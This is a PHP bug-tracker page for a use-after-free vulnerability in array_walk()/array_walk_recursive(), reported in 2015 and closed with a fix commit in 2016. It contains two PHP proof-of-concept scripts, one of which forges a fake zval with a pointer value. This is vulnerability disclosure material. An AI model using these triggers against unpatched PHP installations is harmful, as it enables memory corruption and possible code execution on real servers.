PHP :: Bug #70713 :: Use After Free Vulnerability in array_walk()/array_walk

Bug #70713

Use After Free Vulnerability in array_walk()/array_walk_recursive()

Submitted:

2015-10-14 16:39 UTC

Modified:

2016-07-29 22:21 UTC

Votes:	1
Avg. Score:	3.0 ± 0.0
Reproduced:	1 of 1 (100.0%)
Same Version:	0 (0.0%)
Same OS:	0 (0.0%)

From:

taoguangchen at icloud dot com

Assigned:

nikic (profile)

Status:

Closed

Package:

*General Issues

PHP Version:

Irrelevant

OS:

Private report:

CVE-ID:

None

View Add Comment Developer Edit

Anyone can comment on a bug. Have a simpler test case? Does it work for you on a different platform? Let us know!
Just going to say 'Me too!'? Don't clutter the database with that please !

Your email address: MUST BE VALID
Solve the problem: 35 - 13 = ?
Subscribe to this entry?

[2015-10-14 16:39 UTC] taoguangchen at icloud dot com

Description:
------------
Use After Free Vulnerability in array_walk()/array_walk_recursive()

```
static int php_array_walk(HashTable *target_hash, zval *userdata, int recursive TSRMLS_DC) /* {{{ */
{
	...
	
	BG(array_walk_fci).retval_ptr_ptr = &retval_ptr;
	BG(array_walk_fci).param_count = userdata ? 3 : 2;
	BG(array_walk_fci).params = args;
	BG(array_walk_fci).no_separation = 0;
	
	/* Iterate through hash */
	zend_hash_internal_pointer_reset(target_hash);
	while (!EG(exception) && zend_hash_get_current_data(target_hash, (void **)&args[0]) == SUCCESS) {
	
	...
			if (zend_call_function(&BG(array_walk_fci), &BG(array_walk_fci_cache) TSRMLS_CC) == SUCCESS) {
	...

PHP_FUNCTION(array_walk)
{
	...

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "Hf|z/", &array, &BG(array_walk_fci), &BG(array_walk_fci_cache), &userdata) == FAILURE) {
		BG(array_walk_fci) = orig_array_walk_fci;
		BG(array_walk_fci_cache) = orig_array_walk_fci_cache;
		return;
	}

	php_array_walk(array, userdata, 0 TSRMLS_CC);
```

the array_walk()/array_walk_recursive()'s callback function to a object-type ZVAL is able to call to the object's magic methods, this means an attacker will be able to changes the original array and its elements. this should result in use-after-free attack and arbitrary code execution.

PoC1
```
class obj
{
	function __tostring()
	{
		global $arr, $zval;
		
		$arr = 1;
		$zval = ptr2str(2);
		$zval .= ptr2str(0x1122334455);
		$zval .= "\x00\x00\x00\x00";
		$zval .= "\x05";
		$zval .= "\x00";
		$zval .= "\x00\x00";
		
		return 'hi';
	}
}

$arr = array('string' => new obj, 1);
array_walk_recursive($arr, 'settype');
```

PoC2
```
class obj
{
	function __tostring()
	{
		global $arr;
		
		$arr = 1;
		for ($i = 0; $i < 5; $i++) {
			$v[$i] = 'hi'.$i;
		}
		
		return 'hi';
	}
}

$arr = array('string' => new obj);
array_walk_recursive($arr, 'settype');
```

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports

[2015-10-14 16:43 UTC] stas@php.net

-Type: Security +Type: Bug

[2016-07-29 22:21 UTC] nikic@php.net

-Status: Open +Status: Closed -Assigned To: +Assigned To: nikic

[2016-07-29 22:21 UTC] nikic@php.net

Fixed as part of https://github.com/php/php-src/commit/11e050920d3052d2b14a9cff6c4c5764d674fc46.

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Fri Apr 19 06:01:29 2024 UTC